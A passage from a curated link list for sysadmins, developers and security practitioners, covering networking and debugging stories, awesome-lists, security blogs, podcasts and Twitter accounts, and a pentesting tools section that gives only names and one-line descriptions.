:small_orange_diamond: <a href="https://blog.benjojo.co.uk/post/why-is-ethernet-mtu-1500"><b>How 1500 bytes became the MTU of the internet</b></a> - great story about the Maximum Transmission Unit.<br>
:small_orange_diamond: <a href="http://poormansprofiler.org/"><b>poor man's profiler</b></a> - like dtrace's don't really provide methods to see what programs are blocking on.<br>
:small_orange_diamond: <a href="https://nickcraver.com/blog/2017/05/22/https-on-stack-overflow/"><b>HTTPS on Stack Overflow</b></a> - this is the story of a long journey regarding the implementation of SSL.<br>
:small_orange_diamond: <a href="https://drawings.jvns.ca/"><b>Julia's Drawings</b></a> - some drawings about programming and unix world, zines about systems & debugging tools.<br>
:small_orange_diamond: <a href="https://github.com/corkami/collisions"><b>Hash collisions</b></a> - this great repository is focused on hash collisions exploitation.<br>
:small_orange_diamond: <a href="https://github.com/in3rsha/sha256-animation"><b>sha256-animation</b></a> - animation of the SHA-256 hash function in your terminal.<br>
:small_orange_diamond: <a href="https://labs.ripe.net/Members/cteusche/bgp-meets-cat"><b>BGP Meets Cat</b></a> - after 3072 hours of manipulating BGP, Job Snijders has succeeded in drawing a Nyancat.<br>
:small_orange_diamond: <a href="https://github.com/benjojo/bgp-battleships"><b>bgp-battleships</b></a> - playing battleships over BGP.<br>
:small_orange_diamond: <a href="https://github.com/alex/what-happens-when"><b>What happens when...</b></a> - you type google.com into your browser and press enter?<br>
:small_orange_diamond: <a href="https://github.com/vasanthk/how-web-works"><b>how-web-works</b></a> - based on the 'What happens when...' repository.<br>
:small_orange_diamond: <a href="https://robertheaton.com/2018/11/28/https-in-the-real-world/"><b>HTTPS in the real world</b></a> - great tutorial explain how HTTPS works in the real world.<br>
:small_orange_diamond: <a href="https://about.gitlab.com/2018/11/14/how-we-spent-two-weeks-hunting-an-nfs-bug/"><b>Gitlab and NFS bug</b></a> - how we spent two weeks hunting an NFS bug in the Linux kernel.<br>
:small_orange_diamond: <a href="https://about.gitlab.com/2017/02/10/postmortem-of-database-outage-of-january-31/"><b>Gitlab melts down</b></a> - postmortem on the database outage of January 31 2017 with the lessons we learned.<br>
:small_orange_diamond: <a href="http://www.catb.org/esr/faqs/hacker-howto.html"><b>How To Become A Hacker</b></a> - if you want to be a hacker, keep reading.<br>
:small_orange_diamond: <a href="http://ithare.com/infographics-operation-costs-in-cpu-clock-cycles/"><b>Operation Costs in CPU</b></a> - should help to estimate costs of certain operations in CPU clocks.<br>
:small_orange_diamond: <a href="https://cstack.github.io/db_tutorial/"><b>Let's Build a Simple Database</b></a> - writing a sqlite clone from scratch in C.<br>
:small_orange_diamond: <a href="https://djhworld.github.io/post/2019/05/21/i-dont-know-how-cpus-work-so-i-simulated-one-in-code/"><b>simple-computer</b></a> - great resource to understand how computers work under the hood.<br>
:small_orange_diamond: <a href="https://www.troyhunt.com/working-with-154-million-records-on/"><b>The story of "Have I been pwned?"</b></a> - working with 154 million records on Azure Table Storage.<br>
:small_orange_diamond: <a href="https://www.top500.org/"><b>TOP500 Supercomputers</b></a> - shows the 500 most powerful commercially available computer systems known to us.<br>
:small_orange_diamond: <a href="https://www.shellntel.com/blog/2017/2/8/how-to-build-a-8-gpu-password-cracker"><b>How to build a 8 GPU password cracker</b></a> - any "black magic" or hours of frustration like desktop components do.<br>
:small_orange_diamond: <a href="https://home.cern/science/computing"><b>CERN Data Centre</b></a> - 3D visualizations of the CERN computing environments (and more).<br>
:small_orange_diamond: <a href="http://howfuckedismydatabase.com/"><b>How fucked is my database</b></a> - evaluate how fucked your database is with this handy website.<br>
:small_orange_diamond: <a href="https://krisbuytaert.be/blog/linux-troubleshooting-101-2016-edition/index.html"><b>Linux Troubleshooting 101 , 2016 Edition</b></a> - everything is a DNS Problem...<br>
:small_orange_diamond: <a href="https://open.buffer.com/5-whys-process/"><b>Five Whys</b></a> - you know what the problem is, but you cannot solve it?<br>
:small_orange_diamond: <a href="https://gvnshtn.com/maersk-me-notpetya/"><b>Maersk, me & notPetya</b></a> - how did ransomware successfully hijack hundreds of domain controllers?<br>
:small_orange_diamond: <a href="https://howhttps.works/"><b>howhttps.works</b></a> - how HTTPS works ...in a comic!<br>
:small_orange_diamond: <a href="https://howdns.works/"><b>howdns.works</b></a> - a fun and colorful explanation of how DNS works.<br>
:small_orange_diamond: <a href="https://postgresqlco.nf/en/doc/param/"><b>POSTGRESQLCO.NF</b></a> - your postgresql.conf documentation and recommendations.<br>
</p>
#### Inspiring Lists [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: SysOps/DevOps
<p>
:small_orange_diamond: <a href="https://github.com/kahun/awesome-sysadmin"><b>Awesome Sysadmin</b></a> - amazingly awesome open source sysadmin resources.<br>
:small_orange_diamond: <a href="https://github.com/alebcay/awesome-shell"><b>Awesome Shell</b></a> - awesome command-line frameworks, toolkits, guides and gizmos.<br>
:small_orange_diamond: <a href="https://github.com/learnbyexample/Command-line-text-processing"><b>Command-line-text-processing</b></a> - finding text to search and replace, sorting to beautifying, and more.<br>
:small_orange_diamond: <a href="https://github.com/caesar0301/awesome-pcaptools"><b>Awesome Pcaptools</b></a> - collection of tools developed by other researchers to process network traces.<br>
:small_orange_diamond: <a href="https://github.com/zoidbergwill/awesome-ebpf"><b>awesome-ebpf</b></a> - a curated list of awesome projects related to eBPF.<br>
:small_orange_diamond: <a href="https://github.com/leandromoreira/linux-network-performance-parameters"><b>Linux Network Performance</b></a> - where some of the network sysctl variables fit into the Linux/Kernel network flow.<br>
:small_orange_diamond: <a href="https://github.com/dhamaniasad/awesome-postgres"><b>Awesome Postgres</b></a> - list of awesome PostgreSQL software, libraries, tools and resources.<br>
:small_orange_diamond: <a href="https://github.com/enochtangg/quick-SQL-cheatsheet"><b>quick-SQL-cheatsheet</b></a> - a quick reminder of all SQL queries and examples on how to use them.<br>
:small_orange_diamond: <a href="https://github.com/Kickball/awesome-selfhosted"><b>Awesome-Selfhosted</b></a> - list of Free Software network services and web applications which can be hosted locally.<br>
:small_orange_diamond: <a href="https://wiki.archlinux.org/index.php/List_of_applications"><b>List of applications</b></a> - huge list of apps sorted by category, as a reference for those looking for packages.<br>
:small_orange_diamond: <a href="https://github.com/InterviewMap/CS-Interview-Knowledge-Map"><b>CS-Interview-Knowledge-Map</b></a> - build the best interview map.<br>
:small_orange_diamond: <a href="https://github.com/Tikam02/DevOps-Guide"><b>DevOps-Guide</b></a> - DevOps Guide from basic to advanced with Interview Questions and Notes.<br>
:small_orange_diamond: <a href="https://issue.freebsdfoundation.org/publication/?m=33057&l=1&view=issuelistBrowser"><b>FreeBSD Journal</b></a> - it is a great list of periodical magazines about FreeBSD and other important things.<br>
:small_orange_diamond: <a href="https://github.com/bregman-arie/devops-interview-questions"><b>devops-interview-questions</b></a> - contains interview questions on various DevOps and SRE related topics.<br></p>
##### :black_small_square: Developers
<p>
:small_orange_diamond: <a href="https://github.com/kamranahmedse/developer-roadmap"><b>Web Developer Roadmap</b></a> - roadmaps, articles and resources to help you choose your path, learn and improve.<br>
:small_orange_diamond: <a href="https://github.com/thedaviddias/Front-End-Checklist"><b>Front-End-Checklist</b></a> - the perfect Front-End Checklist for modern websites and meticulous developers.<br>
:small_orange_diamond: <a href="https://github.com/thedaviddias/Front-End-Performance-Checklist"><b>Front-End-Performance-Checklist</b></a> - Front-End Performance Checklist that runs faster than the others.<br>
:small_orange_diamond: <a href="https://rszalski.github.io/magicmethods/"><b>Python's Magic Methods</b></a> - what are magic methods? They're everything in object-oriented Python.<br>
:small_orange_diamond: <a href="https://github.com/satwikkansal/wtfpython"><b>wtfpython</b></a> - a collection of surprising Python snippets and lesser-known features.<br>
:small_orange_diamond: <a href="https://github.com/twhite96/js-dev-reads"><b>js-dev-reads</b></a> - a list of books and articles for the discerning web developer to read.<br>
:small_orange_diamond: <a href="https://github.com/RomuloOliveira/commit-messages-guide"><b>Commit messages guide</b></a> - a guide to understand the importance of commit messages.<br>
</p>
##### :black_small_square: Security/Pentesting
<p>
:small_orange_diamond: <a href="https://github.com/qazbnm456/awesome-web-security"><b>Awesome Web Security</b></a> - a curated list of Web Security materials and resources.<br>
:small_orange_diamond: <a href="https://github.com/joe-shenouda/awesome-cyber-skills"><b>awesome-cyber-skills</b></a> - a curated list of hacking environments where you can train your cyber skills.<br>
:small_orange_diamond: <a href="https://github.com/devsecops/awesome-devsecops"><b>awesome-devsecops</b></a> - an authoritative list of awesome devsecops tools.<br>
:small_orange_diamond: <a href="https://github.com/jivoi/awesome-osint"><b>awesome-osint</b></a> - is a curated list of amazingly awesome OSINT.<br>
:small_orange_diamond: <a href="https://github.com/HolyBugx/HolyTips"><b>HolyTips</b></a> - tips and tutorials on Bug Bounty Hunting and Web App Security.<br>
:small_orange_diamond: <a href="https://github.com/hslatman/awesome-threat-intelligence"><b>awesome-threat-intelligence</b></a> - a curated list of Awesome Threat Intelligence resources.<br>
:small_orange_diamond: <a href="https://github.com/infosecn1nja/Red-Teaming-Toolkit"><b>Red-Teaming-Toolkit</b></a> - a collection of open source and commercial tools that aid in red team operations.<br>
:small_orange_diamond: <a href="https://github.com/snoopysecurity/awesome-burp-extensions"><b>awesome-burp-extensions</b></a> - a curated list of amazingly awesome Burp Extensions.<br>
:small_orange_diamond: <a href="https://github.com/Hack-with-Github/Free-Security-eBooks"><b>Free Security eBooks</b></a> - list of a Free Security and Hacking eBooks.<br>
:small_orange_diamond: <a href="https://github.com/yeahhub/Hacking-Security-Ebooks"><b>Hacking-Security-Ebooks</b></a> - top 100 Hacking & Security E-Books.<br>
:small_orange_diamond: <a href="https://github.com/nikitavoloboev/privacy-respecting"><b>privacy-respecting</b></a> - curated list of privacy respecting services and software.<br>
:small_orange_diamond: <a href="https://github.com/wtsxDev/reverse-engineering"><b>reverse-engineering</b></a> - list of awesome reverse engineering resources.<br>
:small_orange_diamond: <a href="https://github.com/michalmalik/linux-re-101"><b>linux-re-101</b></a> - a collection of resources for linux reverse engineering.<br>
:small_orange_diamond: <a href="https://github.com/onethawt/reverseengineering-reading-list"><b>reverseengineering-reading-list</b></a> - a list of Reverse Engineering articles, books, and papers.<br>
:small_orange_diamond: <a href="https://github.com/0xInfection/Awesome-WAF"><b>Awesome-WAF</b></a> - a curated list of awesome web-app firewall (WAF) stuff.<br>
:small_orange_diamond: <a href="https://github.com/jakejarvis/awesome-shodan-queries"><b>awesome-shodan-queries</b></a> - interesting, funny, and depressing search queries to plug into shodan.io.<br>
:small_orange_diamond: <a href="https://github.com/danielmiessler/RobotsDisallowed"><b>RobotsDisallowed</b></a> - a curated list of the most common and most interesting robots.txt disallowed directories.<br>
:small_orange_diamond: <a href="https://github.com/Kayzaks/HackingNeuralNetworks"><b>HackingNeuralNetworks</b></a> - is a small course on exploiting and defending neural networks.<br>
:small_orange_diamond: <a href="https://gist.github.com/joepie91/7e5cad8c0726fd6a5e90360a754fc568"><b>wildcard-certificates</b></a> - why you probably shouldn't use a wildcard certificate.<br>
:small_orange_diamond: <a href="https://gist.github.com/joepie91/5a9909939e6ce7d09e29"><b>Don't use VPN services</b></a> - which is what every third-party "VPN provider" does.<br>
:small_orange_diamond: <a href="https://github.com/InQuest/awesome-yara"><b>awesome-yara</b></a> - a curated list of awesome YARA rules, tools, and people.<br>
:small_orange_diamond: <a href="https://github.com/drduh/macOS-Security-and-Privacy-Guide"><b>macOS-Security-and-Privacy-Guide</b></a> - guide to securing and improving privacy on macOS.<br>
:small_orange_diamond: <a href="https://github.com/usnistgov/macos_security"><b>macos_security</b></a> - macOS Security Compliance Project.<br>
:small_orange_diamond: <a href="https://github.com/PaulSec/awesome-sec-talks"><b>awesome-sec-talks</b></a> - is a collected list of awesome security talks.<br>
:small_orange_diamond: <a href="https://github.com/k4m4/movies-for-hackers"><b>Movies for Hackers</b></a> - list of movies every hacker & cyberpunk must watch.<br>
:small_orange_diamond: <a href="https://github.com/danieldizzy/Cryptography_1"><b>Cryptography_1</b></a> - materials used whilst taking Prof. Dan Boneh Stanford Crypto course.<br>
:small_orange_diamond: <a href="https://github.com/ashutosh1206/Crypton"><b>Crypton</b></a> - library to learn and practice Offensive and Defensive Cryptography.<br>
</p>
##### :black_small_square: Other
<p>
:small_orange_diamond: <a href="https://www.cheatography.com/"><b>Cheatography</b></a> - over 3,000 free cheat sheets, revision aids and quick references.<br>
:small_orange_diamond: <a href="https://github.com/mre/awesome-static-analysis"><b>awesome-static-analysis</b></a> - static analysis tools for all programming languages.<br>
:small_orange_diamond: <a href="https://github.com/ossu/computer-science"><b>computer-science</b></a> - path to a free self-taught education in Computer Science.<br>
:small_orange_diamond: <a href="https://github.com/danluu/post-mortems"><b>post-mortems</b></a> - is a collection of postmortems (config errors, hardware failures, and more).<br>
:small_orange_diamond: <a href="https://github.com/danistefanovic/build-your-own-x"><b>build-your-own-x</b></a> - build your own (insert technology here).<br>
:small_orange_diamond: <a href="https://github.com/rby90/Project-Based-Tutorials-in-C"><b>Project-Based-Tutorials-in-C</b></a> - is a curated list of project-based tutorials in C.<br>
:small_orange_diamond: <a href="https://github.com/kylelobo/The-Documentation-Compendium"><b>The-Documentation-Compendium</b></a> - various README templates & tips on writing high-quality documentation.<br>
:small_orange_diamond: <a href="https://github.com/mahmoud/awesome-python-applications"><b>awesome-python-applications</b></a> - free software that works great, and also happens to be open-source Python.<br>
:small_orange_diamond: <a href="https://github.com/awesomedata/awesome-public-datasets"><b>awesome-public-datasets</b></a> - a topic-centric list of HQ open datasets.<br>
:small_orange_diamond: <a href="https://github.com/Sahith02/machine-learning-algorithms"><b>machine-learning-algorithms</b></a> - a curated list of all machine learning algorithms and concepts.<br>
</p>
#### Blogs/Podcasts/Videos [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: SysOps/DevOps
<p>
:small_orange_diamond: <a href="https://www.youtube.com/watch?v=nAFpkV5-vuI"><b>Varnish for PHP developers</b></a> - very interesting presentation of Varnish by Mattias Geniar.<br>
:small_orange_diamond: <a href="https://www.youtube.com/watch?v=CZ3wIuvmHeM"><b>A Netflix Guide to Microservices</b></a> - talks about the chaotic and vibrant world of microservices at Netflix.<br>
</p>
##### :black_small_square: Developers
<p>
:small_orange_diamond: <a href="https://www.youtube.com/watch?v=yOyaJXpAYZQ"><b>Comparing C to machine lang</b></a> - compare a simple C app with the compiled machine code of that program.<br>
</p>
##### :black_small_square: Geeky Persons
<p>
:small_orange_diamond: <a href="http://www.brendangregg.com/"><b>Brendan Gregg's Blog</b></a> - is an industry expert in computing performance and cloud computing.<br>
:small_orange_diamond: <a href="https://gynvael.coldwind.pl/"><b>Gynvael "GynDream" Coldwind</b></a> - is a IT security engineer at Google.<br>
:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/"><b>Michał "lcamtuf" Zalewski</b></a> - white hat hacker, computer security expert.<br>
:small_orange_diamond: <a href="https://ma.ttias.be/"><b>Mattias Geniar</b></a> - developer, sysadmin, blogger, podcaster and public speaker.<br>
:small_orange_diamond: <a href="https://nickcraver.com/"><b>Nick Craver</b></a> - software developer and systems administrator for Stack Exchange.<br>
:small_orange_diamond: <a href="https://scotthelme.co.uk/"><b>Scott Helme</b></a> - security researcher, speaker and founder of securityheaders.com and report-uri.com.<br>
:small_orange_diamond: <a href="https://krebsonsecurity.com/"><b>Brian Krebs</b></a> - The Washington Post and now an Independent investigative journalist.<br>
:small_orange_diamond: <a href="https://www.schneier.com/"><b>Bruce Schneier</b></a> - is an internationally renowned security technologist, called a "security guru".<br>
:small_orange_diamond: <a href="https://chrissymorgan.co.uk/"><b>Chrissy Morgan</b></a> - advocate of practical learning, Chrissy also takes part in bug bounty programs.<br>
:small_orange_diamond: <a href="https://blog.zsec.uk/"><b>Andy Gill</b></a> - is a hacker at heart who works as a senior penetration tester.<br>
:small_orange_diamond: <a href="https://danielmiessler.com/"><b>Daniel Miessler</b></a> - cybersecurity expert and writer.<br>
:small_orange_diamond: <a href="https://samy.pl/"><b>Samy Kamkar</b></a> - is an American privacy and security researcher, computer hacker.<br>
:small_orange_diamond: <a href="https://www.j4vv4d.com/"><b>Javvad Malik</b></a> - is a security advocate at AlienVault, a blogger event speaker and industry commentator.<br>
:small_orange_diamond: <a href="https://www.grahamcluley.com/"><b>Graham Cluley</b></a> - public speaker and independent computer security analyst.<br>
:small_orange_diamond: <a href="https://security.szurek.pl/"><b>Kacper Szurek</b></a> - detection engineer at ESET.<br>
:small_orange_diamond: <a href="https://www.troyhunt.com/"><b>Troy Hunt</b></a> - web security expert known for public education and outreach on security topics.<br>
:small_orange_diamond: <a href="https://raymii.org/s/index.html"><b>raymii.org</b></a> - sysadmin specializing in building high availability cloud environments.<br>
:small_orange_diamond: <a href="https://robert.penz.name/"><b>Robert Penz</b></a> - IT security expert.<br>
</p>
##### :black_small_square: Geeky Blogs
<p>
:small_orange_diamond: <a href="https://linux-audit.com/"><b>Linux Audit</b></a> - the Linux security blog about auditing, hardening and compliance by Michael Boelen.<br>
:small_orange_diamond: <a href="https://linuxsecurity.expert/"><b>
Linux Security Expert</b></a> - trainings, howtos, checklists, security tools, and more.<br>
:small_orange_diamond: <a href="http://www.grymoire.com/"><b>The Grymoire</b></a> - collection of useful incantations for wizards, be you computer wizards, magicians, or whatever.<br>
:small_orange_diamond: <a href="https://www.secjuice.com"><b>Secjuice</b></a> - is the only non-profit, independent and volunteer led publication in the information security space.<br>
:small_orange_diamond: <a href="https://duo.com/decipher"><b>Decipher</b></a> - security news that informs and inspires.<br>
</p>
##### :black_small_square: Geeky Vendor Blogs
<p>
:small_orange_diamond: <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br>
:small_orange_diamond: <a href="https://nakedsecurity.sophos.com/"><b>Sophos</b></a> - threat news room, giving you news, opinion, advice and research on computer security issues.<br>
:small_orange_diamond: <a href="https://www.tripwire.com/state-of-security/"><b>Tripwire State of Security</b></a> - blog featuring the latest news, trends and insights on current security issues.<br>
:small_orange_diamond: <a href="https://blog.malwarebytes.com/"><b>Malwarebytes Labs Blog</b></a> - security blog aims to provide insider news about cybersecurity.<br>
:small_orange_diamond: <a href="https://www.trustedsec.com/category/articles/"><b>TrustedSec</b></a> - latest news, and trends about cybersecurity.<br>
:small_orange_diamond: <a href="https://portswigger.net/blog"><b>PortSwigger Web Security Blog</b></a> - about web app security vulns and top tips from our team of web security.<br>
:small_orange_diamond: <a href="https://www.alienvault.com/blogs"><b>AT&T Cybersecurity blog</b></a> - news on emerging threats and practical advice to simplify threat detection.<br>
:small_orange_diamond: <a href="https://thycotic.com/company/blog/"><b>Thycotic</b></a> - where CISOs and IT Admins come to learn about industry trends, IT security, and more.<br>
</p>
##### :black_small_square: Geeky Cybersecurity Podcasts
<p>
:small_orange_diamond: <a href="https://risky.biz/netcasts/risky-business/"><b>Risky Business</b></a> - is a weekly information security podcast featuring news and in-depth interviews.<br>
:small_orange_diamond: <a href="https://www.vice.com/en_us/topic/cyber"><b>Cyber, by Motherboard</b></a> - stories, and focus on the ideas about cybersecurity.<br>
:small_orange_diamond: <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br>
:small_orange_diamond: <a href="https://podcasts.apple.com/gb/podcast/cybercrime-investigations/id1428801405"><b>
Cybercrime Investigations</b></a> - podcast by Geoff White about cybercrimes.<br>
:small_orange_diamond: <a href="https://themanyhats.club/tag/episodes/"><b>The many hats club</b></a> - featuring stories from a wide range of Infosec people (Whitehat, Greyhat and Blackhat).<br>
:small_orange_diamond: <a href="https://darknetdiaries.com/"><b>Darknet Diaries</b></a> - true stories from the dark side of the Internet.<br>
:small_orange_diamond: <a href="https://www.youtube.com/playlist?list=PL423I_gHbWUXah3dmt_q_XNp0NlGAKjis"><b>OSINTCurious Webcasts</b></a> - is the investigative curiosity that helps people be successful in OSINT.<br>
:small_orange_diamond: <a href="https://www.youtube.com/user/SecurityWeeklyTV"><b>Security Weekly</b></a> - the latest information security and hacking news.<br>
</p>
##### :black_small_square: Geeky Cybersecurity Video Blogs
<p>
:small_orange_diamond: <a href="https://www.youtube.com/channel/UCzvJStjySZVvOBsPl-Vgj0g"><b>rev3rse security</b></a> - offensive, binary exploitation, web app security, hardening, red team, blue team.<br>
:small_orange_diamond: <a href="https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w"><b>LiveOverflow</b></a> - a lot more advanced topics than what is typically offered in paid online courses - but for free.<br>
:small_orange_diamond: <a href="https://www.youtube.com/infoseccynic"><b>J4vv4D</b></a> - the important information regarding our internet security.<br>
:small_orange_diamond: <a href="https://cybertalks.co.uk/"><b>
CyberTalks</b></a> - talks, interviews, and article about cybersecurity.<br>
</p>
##### :black_small_square: Best Personal Twitter Accounts
<p>
:small_orange_diamond: <a href="https://twitter.com/blackroomsec"><b>@blackroomsec</b></a> - a white-hat hacker/pentester. Intergalactic Minesweeper Champion 1990.<br>
:small_orange_diamond: <a href="https://twitter.com/MarcoCiappelli"><b>@MarcoCiappelli</b></a> - Co-Founder @ITSPmagazine, at the intersection of IT security and society.<br>
:small_orange_diamond: <a href="https://twitter.com/binitamshah"><b>@binitamshah</b></a> - Linux Evangelist. Malwares. Kernel Dev. Security Enthusiast.<br>
:small_orange_diamond: <a href="https://twitter.com/joe_carson"><b>@joe_carson</b></a> - an InfoSec Professional and Tech Geek.<br>
:small_orange_diamond: <a href="https://twitter.com/mikko"><b>@mikko</b></a> - CRO at F-Secure, Reverse Engineer, TED Speaker, Supervillain.<br>
:small_orange_diamond: <a href="https://twitter.com/esrtweet"><b>@esrtweet</b></a> - often referred to as ESR, is an American software developer, and open-source software advocate.<br>
:small_orange_diamond: <a href="https://twitter.com/gynvael"><b>@gynvael</b></a> - security researcher/programmer, @DragonSectorCTF founder/player, technical streamer.<br>
:small_orange_diamond: <a href="https://twitter.com/x0rz"><b>@x0rz</b></a> - Security Researcher & Cyber Observer.<br>
:small_orange_diamond: <a href="https://twitter.com/hasherezade"><b>@hasherezade</b></a> - programmer, malware analyst. Author of PEbear, PEsieve, libPeConv.<br>
:small_orange_diamond: <a href="https://twitter.com/TinkerSec"><b>@TinkerSec</b></a> - tinkerer, cypherpunk, hacker.<br>
:small_orange_diamond: <a href="https://twitter.com/alisaesage"><b>@alisaesage</b></a> - independent hacker and researcher.<br>
:small_orange_diamond: <a href="https://twitter.com/SwiftOnSecurity"><b>@SwiftOnSecurity</b></a> - systems security, industrial safety, sysadmin, author of decentsecurity.com.<br>
:small_orange_diamond: <a href="https://twitter.com/dakami"><b>@dakami</b></a> - is one of just seven people with the authority to restore the DNS root keys.<br>
:small_orange_diamond: <a href="https://twitter.com/samykamkar"><b>@samykamkar</b></a> - is a famous "grey hat" hacker, security researcher, creator of the MySpace "Samy" worm.<br>
:small_orange_diamond: <a href="https://twitter.com/securityweekly"><b>@securityweekly</b></a> - founder & CTO of Security Weekly podcast network.<br>
:small_orange_diamond: <a href="https://twitter.com/jack_daniel"><b>@jack_daniel</b></a> - @SecurityBSides co-founder.<br>
:small_orange_diamond: <a href="https://twitter.com/thegrugq"><b>@thegrugq</b></a> - Security Researcher.<br>
:small_orange_diamond: <a href="https://twitter.com/matthew_d_green"><b>@matthew_d_green</b></a> - a cryptographer and professor at Johns Hopkins University.<br>
</p>
##### :black_small_square: Best Commercial Twitter Accounts
<p>
:small_orange_diamond: <a href="https://twitter.com/haveibeenpwned"><b>@haveibeenpwned</b></a> - check if you have an account that has been compromised in a data breach.<br>
:small_orange_diamond: <a href="https://twitter.com/bugcrowd"><b>@bugcrowd</b></a> - trusted by more of the Fortune 500 than any other crowdsourced security platform.<br>
:small_orange_diamond: <a href="https://twitter.com/Malwarebytes"><b>@Malwarebytes</b></a> - most trusted security company. Unmatched threat visibility.<br>
:small_orange_diamond: <a href="https://twitter.com/sansforensics"><b>@sansforensics</b></a> - the world's leading Digital Forensics and Incident Response provider.<br>
:small_orange_diamond: <a href="https://twitter.com/attcyber"><b>@attcyber</b></a> - AT&T Cybersecurity’s Edge-to-Edge technologies provide threat intelligence, and more.<br>
:small_orange_diamond: <a href="https://twitter.com/TheManyHatsClub"><b>@TheManyHatsClub</b></a> - an information security focused podcast and group of individuals from all walks of life.<br>
:small_orange_diamond: <a href="https://twitter.com/hedgehogsec"><b>@hedgehogsec</b></a> - Hedgehog Cyber. Gibraltar and Manchester's top boutique information security firm.<br>
:small_orange_diamond: <a href="https://twitter.com/NCSC"><b>@NCSC</b></a> - the National Cyber Security Centre. Helping to make the UK the safest place to live and work online.<br>
:small_orange_diamond: <a href="https://twitter.com/Synacktiv"><b>@Synacktiv</b></a> - IT security experts.<br>
</p>
##### :black_small_square: A piece of history
<p>
:small_orange_diamond: <a href="http://ftp.arl.army.mil/~mike/howto/"><b>How to Do Things at ARL</b></a> - how to configure modems, scan images, record CD-ROMs, and other.<b>*</b><br>
</p>
##### :black_small_square: Other
<p>
:small_orange_diamond: <a href="https://www.youtube.com/watch?v=3QnD2c4Xovk"><b>Diffie-Hellman Key Exchange (short version)</b></a> - how Diffie-Hellman Key Exchange worked.<br>
</p>
#### Hacking/Penetration Testing [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Pentesters arsenal tools
<p>
:small_orange_diamond: <a href="http://www.syhunt.com/sandcat/"><b>Sandcat Browser</b></a> - a penetration-oriented browser with plenty of advanced functionality already built in.<br>
:small_orange_diamond: <a href="https://www.metasploit.com/"><b>Metasploit</b></a> - tool and framework for pentesting system, web and many more, contains a lot a ready to use exploit.<br>
:small_orange_diamond: <a href="https://portswigger.net/burp"><b>Burp Suite</b></a> - tool for testing web app security, intercepting proxy to replay, inject, scan and fuzz.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project"><b>OWASP Zed Attack Proxy</b></a> - intercepting proxy to replay, inject, scan and fuzz HTTP requests.<br>
:small_orange_diamond: <a href="http://w3af.org/"><b>w3af</b></a> - is a Web Application Attack and Audit Framework.<br>
:small_orange_diamond: <a href="https://mitmproxy.org/"><b>mitmproxy</b></a> - an interactive TLS-capable intercepting HTTP proxy for penetration testers.<br>
:small_orange_diamond: <a href="https://cirt.net/Nikto2"><b>Nikto2</b></a> - web server scanner which performs comprehensive tests against web servers for multiple items.<br>
:small_orange_diamond: <a href="http://sqlmap.org/"><b>sqlmap</b></a> - tool that automates the process of detecting and exploiting SQL injection flaws.<br>
:small_orange_diamond: <a href="https://github.com/lanmaster53/recon-ng"><b>Recon-ng</b></a> - is a full-featured Web Reconnaissance framework written in Python.<br>
:small_orange_diamond: <a href="https://github.com/Tib3rius/AutoRecon"><b>AutoRecon</b></a> - is a network reconnaissance tool which performs automated enumeration of services.<br>
:small_orange_diamond: <a href="https://www.faradaysec.com/"><b>Faraday</b></a> - an Integrated Multiuser Pentest Environment.<br>
:small_orange_diamond: <a href="https://github.com/s0md3v/Photon"><b>Photon</b></a> - incredibly fast crawler designed for OSINT.<br>
:small_orange_diamond: <a href="https://github.com/s0md3v/XSStrike"><b>XSStrike</b></a> - most advanced XSS detection suite.<br>
:small_orange_diamond: <a href="https://github.com/1N3/Sn1per"><b>Sn1per</b></a> - automated pentest framework for offensive security experts.<br>
:small_orange_diamond: <a href="https://github.com/future-architect/vuls"><b>vuls</b></a> - is an agent-less vulnerability scanner for Linux, FreeBSD, and other.<br>
:small_orange_diamond: <a href="https://github.com/google/tsunami-security-scanner"><b>tsunami</b></a> - is a general purpose network security scanner with an extensible plugin system.<br>
:small_orange_diamond: <a href="https://github.com/michenriksen/aquatone"><b>aquatone</b></a> - a tool for domain flyovers.<br>
:small_orange_diamond: <a href="https://github.com/GitHackTools/BillCipher"><b>BillCipher</b></a> - information gathering tool for a website or IP address.<br>
:small_orange_diamond: <a href="https://github.com/Ekultek/WhatWaf"><b>WhatWaf</b></a> - detect and bypass web application firewalls and protection systems.<br>
:small_orange_diamond: <a href="https://github.com/s0md3v/Corsy"><b>Corsy</b></a> - CORS misconfiguration scanner.<br>
:small_orange_diamond: <a href="https://github.com/evyatarmeged/Raccoon"><b>Raccoon</b></a> - is a high performance offensive security tool for reconnaissance and vulnerability scanning.<br>
:small_orange_diamond: <a href="https://github.com/Nekmo/dirhunt"><b>dirhunt</b></a> - find web directories without bruteforce.<br>
:small_orange_diamond: <a href="https://www.openwall.com/john/"><b>John The Ripper</b></a> - is a fast password cracker, currently available for many flavors of Unix, Windows, and other.<br>
:small_orange_diamond: <a href="https://hashcat.net/hashcat/"><b>hashcat</b></a> - world's fastest and most advanced password recovery utility.<br>
:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/p0f3/"><b>p0f</b></a> - is a tool to identify the players behind any incidental TCP/IP communications.<br>
:small_orange_diamond: <a href="https://github.com/mozilla/ssh_scan"><b>ssh_scan</b></a> - a prototype SSH configuration and policy scanner.<br>
:small_orange_diamond: <a href="https://github.com/woj-ciech/LeakLooker"><b>LeakLooker</b></a> - find open databases - powered by Binaryedge.io<br>
:small_orange_diamond: <a href="https://github.com/offensive-security/exploitdb"><b>exploitdb</b></a> - searchable archive from The Exploit Database.<br>
:small_orange_diamond: <a href="https://github.com/vulnersCom/getsploit"><b>getsploit</b></a> - is a command line utility for searching and downloading exploits.<br>
:small_orange_diamond: <a href="https://github.com/zardus/ctf-tools"><b>ctf-tools</b></a> - some setup scripts for security research tools.<br>
:small_orange_diamond: <a href="https://github.com/Gallopsled/pwntools"><b>pwntools</b></a> - CTF framework and exploit development library.<br>
:small_orange_diamond: <a href="https://github.com/bl4de/security-tools"><b>security-tools</b></a> - collection of small security tools created mostly in Python. CTFs, pentests and so on.<br>
:small_orange_diamond: <a href="https://github.com/leonteale/pentestpackage"><b>pentestpackage</b></a> - is a package of Pentest scripts.<br>
